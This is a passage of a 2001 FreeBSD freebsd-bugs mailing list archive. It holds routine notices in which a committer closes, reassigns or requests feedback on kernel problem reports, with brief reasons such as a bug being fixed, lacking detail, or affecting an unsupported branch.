9 16:53:13 PDT 2001 State-Changed-Why: This has most likely been fixed, and the originator did not respond to yokota's request for further information. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=11941 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 16:55:43 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EDD9237B403; Sat, 9 Jun 2001 16:55:36 -0700 (PDT) (envelope-from dd@FreeBSD.org) Received: (from dd@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f59Ntas62610; Sat, 9 Jun 2001 16:55:36 -0700 (PDT) (envelope-from dd) Date: Sat, 9 Jun 2001 16:55:36 -0700 (PDT) From: Message-Id: <200106092355.f59Ntas62610@freefall.freebsd.org> To: dutch@charm.net, dd@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/13404: Warning that pseudo-device log is unknown while make of new kernel. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Warning that pseudo-device log is unknown while make of new kernel. State-Changed-From-To: open->closed State-Changed-By: dd State-Changed-When: Sat Jun 9 16:54:56 PDT 2001 State-Changed-Why: This psuedo-device no longer exists in -current or -stable. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=13404 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 16:58: 9 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1E65F37B401; Sat, 9 Jun 2001 16:58:05 -0700 (PDT) (envelope-from dd@FreeBSD.org) Received: (from dd@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f59Nw1Q62854; Sat, 9 Jun 2001 16:58:01 -0700 (PDT) (envelope-from dd) Date: Sat, 9 Jun 2001 16:58:01 -0700 (PDT) From: Message-Id: <200106092358.f59Nw1Q62854@freefall.freebsd.org> To: jake@checker.org, dd@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/14639: convert proc.p_peers to a queue(3) LIST Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: convert proc.p_peers to a queue(3) LIST State-Changed-From-To: open->closed State-Changed-By: dd State-Changed-When: Sat Jun 9 16:57:48 PDT 2001 State-Changed-Why: Over to originator who can decide whether this is still applicable. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=14639 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 16:58:45 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7140037B405; Sat, 9 Jun 2001 16:58:43 -0700 (PDT) (envelope-from dd@FreeBSD.org) Received: (from dd@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f59NwhA62962; Sat, 9 Jun 2001 16:58:43 -0700 (PDT) (envelope-from dd) Date: Sat, 9 Jun 2001 16:58:43 -0700 (PDT) From: Message-Id: <200106092358.f59NwhA62962@freefall.freebsd.org> To: yasu@mrit.mei.co.jp, dd@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/9689: panic in sbdrop(kern/uipc_socket2.c) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: panic in sbdrop(kern/uipc_socket2.c) State-Changed-From-To: open->feedback State-Changed-By: dd State-Changed-When: Sat Jun 9 16:58:28 PDT 2001 State-Changed-Why: Is this still a problem with more recent releases? http://www.FreeBSD.org/cgi/query-pr.cgi?pr=9689 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 17: 0: 3 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8067C37B401; Sat, 9 Jun 2001 16:59:59 -0700 (PDT) (envelope-from dd@FreeBSD.org) Received: (from dd@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f59Nxx563061; Sat, 9 Jun 2001 16:59:59 -0700 (PDT) (envelope-from dd) Date: Sat, 9 Jun 2001 16:59:59 -0700 (PDT) From: Message-Id: <200106092359.f59Nxx563061@freefall.freebsd.org> To: bvaughn@prophetnetworks.net, dd@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/15489: running fstat causes a bus error Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: running fstat causes a bus error State-Changed-From-To: open->closed State-Changed-By: dd State-Changed-When: Sat Jun 9 16:59:48 PDT 2001 State-Changed-Why: Complete lack of information; problem most likely fixed. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=15489 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 17: 1:10 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EF54437B40C; Sat, 9 Jun 2001 17:01:04 -0700 (PDT) (envelope-from dd@FreeBSD.org) Received: (from dd@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f5A014l63169; Sat, 9 Jun 2001 17:01:04 -0700 (PDT) (envelope-from dd) Date: Sat, 9 Jun 2001 17:01:04 -0700 (PDT) From: Message-Id: <200106100001.f5A014l63169@freefall.freebsd.org> To: archie@whistle.com, dd@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/15175: tcp_input() fails to update m->m_pkthdr.len Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: tcp_input() fails to update m->m_pkthdr.len State-Changed-From-To: open->closed State-Changed-By: dd State-Changed-When: Sat Jun 9 17:00:48 PDT 2001 State-Changed-Why: RELENG_3 no longer supported for anything but the most critical fixes. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=15175 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 17:12:36 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C61AA37B403; Sat, 9 Jun 2001 17:12:34 -0700 (PDT) (envelope-from dd@FreeBSD.org) Received: (from dd@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f5A0CY666602; Sat, 9 Jun 2001 17:12:34 -0700 (PDT) (envelope-from dd) Date: Sat, 9 Jun 2001 17:12:34 -0700 (PDT) From: Message-Id: <200106100012.f5A0CY666602@freefall.freebsd.org> To: neurosys@bellsouth.net, dd@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/21524: Crashs while using talk with another local user, forces reboot without dismount Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Crashs while using talk with another local user, forces reboot without dismount State-Changed-From-To: open->closed State-Changed-By: dd State-Changed-When: Sat Jun 9 17:11:21 PDT 2001 State-Changed-Why: Quite franky, this report is useless without *a lot* more information. Furthermore, I can't reproduce this. If this is still a problem in 4.3, please file another PR. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=21524 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 17:24:58 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 211F037B401; Sat, 9 Jun 2001 17:24:57 -0700 (PDT) (envelope-from dd@FreeBSD.org) Received: (from dd@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f5A0Ouj67413; Sat, 9 Jun 2001 17:24:56 -0700 (PDT) (envelope-from dd) Date: Sat, 9 Jun 2001 17:24:56 -0700 (PDT) From: Message-Id: <200106100024.f5A0Ouj67413@freefall.freebsd.org> To: ahd@kew.com, dd@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/22011: Secure level 2 results in mpd failing to attach NETGRAPH nodes Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Secure level 2 results in mpd failing to attach NETGRAPH nodes State-Changed-From-To: open->closed State-Changed-By: dd State-Changed-When: Sat Jun 9 17:24:34 PDT 2001 State-Changed-Why: init(8) does mention a restriction on loading modules, which is what mpd is trying to do. This is entirely appropriate. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=22011 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 17:31: 4 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7929E37B401; Sat, 9 Jun 2001 17:31:02 -0700 (PDT) (envelope-from dd@FreeBSD.org) Received: (from dd@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f5A0V2M67910; Sat, 9 Jun 2001 17:31:02 -0700 (PDT) (envelope-from dd) Date: Sat, 9 Jun 2001 17:31:02 -0700 (PDT) From: Message-Id: <200106100031.f5A0V2M67910@freefall.freebsd.org> To: keith@mithy.demon.co.uk, dd@FreeBSD.org, freebsd-bugs@FreeBSD.org, dd@FreeBSD.org Subject: Re: kern/22228: Undocumented LINT option 'PANIC_REBOOT_WAIT_TIME' Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Undocumented LINT option 'PANIC_REBOOT_WAIT_TIME' State-Changed-From-To: open->analyzed State-Changed-By: dd State-Changed-When: Sat Jun 9 17:30:42 PDT 2001 State-Changed-Why: Committed, thanks! Responsible-Changed-From-To: freebsd-bugs->dd Responsible-Changed-By: dd Responsible-Changed-When: Sat Jun 9 17:30:42 PDT 2001 Responsible-Changed-Why: My MFC reminder. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=22228 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 17:36:11 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id AE51F37B40A; Sat, 9 Jun 2001 17:36:05 -0700 (PDT) (envelope-from dd@FreeBSD.org) Received: (from dd@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f5A0a4u68208; Sat, 9 Jun 2001 17:36:04 -0700 (PDT) (envelope-from dd) Date: Sat, 9 Jun 2001 17:36:04 -0700 (PDT) From: Message-Id: <200106100036.f5A0a4u68208@freefall.freebsd.org> To: vkushnir@Alfacom.net, dd@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/23600: agp.ko module cannot be loaded Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: agp.ko module cannot be loaded State-Changed-From-To: open->closed State-Changed-By: dd State-Changed-When: Sat Jun 9 17:35:55 PDT 2001 State-Changed-Why: This has been fixed. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=23600 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 17:37: 0 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EA70D37B401; Sat, 9 Jun 2001 17:36:58 -0700 (PDT) (envelope-from dd@FreeBSD.org) Received: (from dd@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f5A0awY68316; Sat, 9 Jun 2001 17:36:58 -0700 (PDT) (envelope-from dd) Date: Sat, 9 Jun 2001 17:36:58 -0700 (PDT) From: Message-Id: <200106100036.f5A0awY68316@freefall.freebsd.org> To: sasha@ellink.ru, dd@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/23768: I can't install sound driver in kernel Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: I can't install sound driver in kernel State-Changed-From-To: open->closed State-Changed-By: dd State-Changed-When: Sat Jun 9 17:36:39 PDT 2001 State-Changed-Why: This is most likely user error. Please bring it up on freebsd-questions@ if you're still having problems. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=23768 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 17:39: 6 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C0DF137B403; Sat, 9 Jun 2001 17:39:04 -0700 (PDT) (envelope-from dd@FreeBSD.org) Received: (from dd@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f5A0d4Z68477; Sat, 9 Jun 2001 17:39:04 -0700 (PDT) (envelope-from dd) Date: Sat, 9 Jun 2001 17:39:04 -0700 (PDT) From: Message-Id: <200106100039.f5A0d4Z68477@freefall.freebsd.org> To: ebd@oau.org, dd@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/25019: Problem trying to build new kernel Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Problem trying to build new kernel State-Changed-From-To: open->closed State-Changed-By: dd State-Changed-When: Sat Jun 9 17:38:51 PDT 2001 State-Changed-Why: Transient build error, lack of information, etc. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=25019 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 17:55:17 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EFE0837B407; Sat, 9 Jun 2001 17:55:15 -0700 (PDT) (envelope-from dd@FreeBSD.org) Received: (from dd@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f5A0tFL69168; Sat, 9 Jun 2001 17:55:15 -0700 (PDT) (envelope-from dd) Date: Sat, 9 Jun 2001 17:55:15 -0700 (PDT) From: Message-Id: <200106100055.f5A0tFL69168@freefall.freebsd.org> To: yar@bsd.chem.msu.ru, dd@FreeBSD.org, freebsd-bugs@FreeBSD.org, dd@FreeBSD.org Subject: Re: kern/27616: Syscons history permits peeking in the previous session output Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Syscons history permits peeking in the previous session output State-Changed-From-To: open->analyzed State-Changed-By: dd State-Changed-When: Sat Jun 9 17:54:50 PDT 2001 State-Changed-Why: A CONS_CLRHIST ioctl, which allows one to selectively clear the history, had been added. Responsible-Changed-From-To: freebsd-bugs->dd Responsible-Changed-By: dd Responsible-Changed-When: Sat Jun 9 17:54:50 PDT 2001 Responsible-Changed-Why: My MFC reminder. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=27616 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 17:57:19 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E702137B401; Sat, 9 Jun 2001 17:57:14 -0700 (PDT) (envelope-from dd@FreeBSD.org) Received: (from dd@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f5A0vED69325; Sat, 9 Jun 2001 17:57:14 -0700 (PDT) (envelope-from dd) Date: Sat, 9 Jun 2001 17:57:14 -0700 (PDT) From: Message-Id: <200106100057.f5A0vED69325@freefall.freebsd.org> To: cjl@qnet.com, dd@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/7764: ps(1) hangs in pfslck/lockrd - All subsequent ps(1) commands unkillable Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: ps(1) hangs in pfslck/lockrd - All subsequent ps(1) commands unkillable State-Changed-From-To: open->closed State-Changed-By: dd State-Changed-When: Sat Jun 9 17:56:52 PDT 2001 State-Changed-Why: There have been many changes in this area since 2.2. If this is still a problem with a more recent release, please file another PR. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=7764 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 18: 2:37 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 740C937B403; Sat, 9 Jun 2001 18:02:35 -0700 (PDT) (envelope-from dd@FreeBSD.org) Received: (from dd@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f5A0xtC69522; Sat, 9 Jun 2001 17:59:55 -0700 (PDT) (envelope-from dd) Date: Sat, 9 Jun 2001 17:59:55 -0700 (PDT) From: Message-Id: <200106100059.f5A0xtC69522@freefall.freebsd.org> To: cjohnson@neunacht.netgsi.com, dd@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/9935: vmstat reprots bad AVM values Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: vmstat reprots bad AVM values State-Changed-From-To: open->closed State-Changed-By: dd State-Changed-When: Sat Jun 9 17:59:36 PDT 2001 State-Changed-Why: There have been many changes here since 3.0. If this is still a problem, please file another PR. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=9935 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 18:16:46 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B4B3E37B403; Sat, 9 Jun 2001 18:16:44 -0700 (PDT) (envelope-from dd@FreeBSD.org) Received: (from dd@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f5A1GiV72812; Sat, 9 Jun 2001 18:16:44 -0700 (PDT) (envelope-from dd) Date: Sat, 9 Jun 2001 18:16:44 -0700 (PDT) From: Message-Id: <200106100116.f5A1GiV72812@freefall.freebsd.org> To: zaphodb@zaphods.net, dd@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/17738: reboot after panic: softdep_lock: locking against myself Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: reboot after panic: softdep_lock: locking against myself State-Changed-From-To: open->closed State-Changed-By: dd State-Changed-When: Sat Jun 9 18:16:30 PDT 2001 State-Changed-Why: Complete lack of details, lots of changes in the vicinity, etc. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=17738 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 18:18:48 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 25A7437B401; Sat, 9 Jun 2001 18:18:47 -0700 (PDT) (envelope-from dd@FreeBSD.org) Received: (from dd@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f5A1IbX73012; Sat, 9 Jun 2001 18:18:37 -0700 (PDT) (envelope-from dd) Date: Sat, 9 Jun 2001 18:18:37 -0700 (PDT) From: Message-Id: <200106100118.f5A1IbX73012@freefall.freebsd.org> To: patseal@hyperhost.net, dd@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/18392: no kern.update Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: no kern.update State-Changed-From-To: open->closed State-Changed-By: dd State-Changed-When: Sat Jun 9 18:18:29 PDT 2001 State-Changed-Why: This has been fixed. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=18392 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 18:23:17 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id ACDC337B401; Sat, 9 Jun 2001 18:23:14 -0700 (PDT) (envelope-from dd@FreeBSD.org) Received: (from dd@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f5A1NEd73243; Sat, 9 Jun 2001 18:23:14 -0700 (PDT) (envelope-from dd) Date: Sat, 9 Jun 2001 18:23:14 -0700 (PDT) From: Message-Id: <200106100123.f5A1NEd73243@freefall.freebsd.org> To: archie@whistle.com, dd@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/18763: kernel crashes when sysctl(3) is called Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: kernel crashes when sysctl(3) is called State-Changed-From-To: open->closed State-Changed-By: dd State-Changed-When: Sat Jun 9 18:22:55 PDT 2001 State-Changed-Why: Not a problem on 4-stable; 3-stable not supported. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=18763 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 18:25:20 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5B31F37B408; Sat, 9 Jun 2001 18:25:19 -0700 (PDT) (envelope-from dd@FreeBSD.org) Received: (from dd@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f5A1PJM73450; Sat, 9 Jun 2001 18:25:19 -0700 (PDT) (envelope-from dd) Date: Sat, 9 Jun 2001 18:25:19 -0700 (PDT) From: Message-Id: <200106100125.f5A1PJM73450@freefall.freebsd.org> To: ras@e-gerbil.net, dd@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/19389: Panic caused by sendfile(2) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Panic caused by sendfile(2) State-Changed-From-To: open->feedback State-Changed-By: dd State-Changed-When: Sat Jun 9 18:25:09 PDT 2001 State-Changed-Why: Waiting for the kernel core dump. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=19389 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 18:28:28 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3911B37B405; Sat, 9 Jun 2001 18:28:27 -0700 (PDT) (envelope-from dd@FreeBSD.org) Received: (from dd@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f5A1SRM73634; Sat, 9 Jun 2001 18:28:27 -0700 (PDT) (envelope-from dd) Date: Sat, 9 Jun 2001 18:28:27 -0700 (PDT) From: Message-Id: <200106100128.f5A1SRM73634@freefall.freebsd.org> To: wkwu@csie.nctu.edu.tw, dd@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/22521: netgroup can't work on FreeBSD-4.1.1-STABLE Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: netgroup can't work on FreeBSD-4.1.1-STABLE State-Changed-From-To: open->closed State-Changed-By: dd State-Changed-When: Sat Jun 9 18:28:14 PDT 2001 State-Changed-Why: Not a reasonable problem report. Please ask on questions@ http://www.FreeBSD.org/cgi/query-pr.cgi?pr=22521 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 18:45:52 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id F267F37B443; Sat, 9 Jun 2001 18:45:44 -0700 (PDT) (envelope-from dd@FreeBSD.org) Received: (from dd@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f5A1jiR74781; Sat, 9 Jun 2001 18:45:44 -0700 (PDT) (envelope-from dd) Date: Sat, 9 Jun 2001 18:45:44 -0700 (PDT) From: Message-Id: <200106100145.f5A1jiR74781@freefall.freebsd.org> To: olgeni@uli.it, dd@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/25039: -stable LINT missing the twe device Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: -stable LINT missing the twe device State-Changed-From-To: open->closed State-Changed-By: dd State-Changed-When: Sat Jun 9 18:45:26 PDT 2001 State-Changed-Why: Committed, thanks! http://www.FreeBSD.org/cgi/query-pr.cgi?pr=25039 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 19: 2:23 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8AC4837B50E; Sat, 9 Jun 2001 19:02:10 -0700 (PDT) (envelope-from dd@FreeBSD.org) Received: (from dd@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f5A22A175738; Sat, 9 Jun 2001 19:02:10 -0700 (PDT) (envelope-from dd) Date: Sat, 9 Jun 2001 19:02:10 -0700 (PDT) From: Message-Id: <200106100202.f5A22A175738@freefall.freebsd.org> To: cpeterso@cs.washington.edu, dd@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/11416: code typo in sequencer.c: "if (!processed && 0)" is dead code. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: code typo in sequencer.c: "if (!processed && 0)" is dead code. State-Changed-From-To: open->closed State-Changed-By: dd State-Changed-When: Sat Jun 9 19:01:50 PDT 2001 State-Changed-Why: Dead code removed. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=11416 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 9 20:28:23 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from spode.pacbell.net (adsl-63-198-35-122.dsl.snfc21.pacbell.net [63.198.35.122]) by hub.freebsd.org (Postfix) with ESMTP id 7BD2037B407; Sat, 9 Jun 2001 20:28:19 -0700 (PDT) (envelope-from j_guojun@lbl.gov) Received: from lbl.gov (localhost [127.0.0.1]) by spode.pacbell.net (8.11.3/8.11.3) with ESMTP id f5A3Tij00601; Sat, 9 Jun 2001 20:29:44 -0700 (PDT) (envelope-from j_guojun@lbl.gov) Message-ID: <3B22E9A8.96BC5E17@lbl.gov> Date: Sat, 09 Jun 2001 20:29:44 -0700 From: Jin Guojun 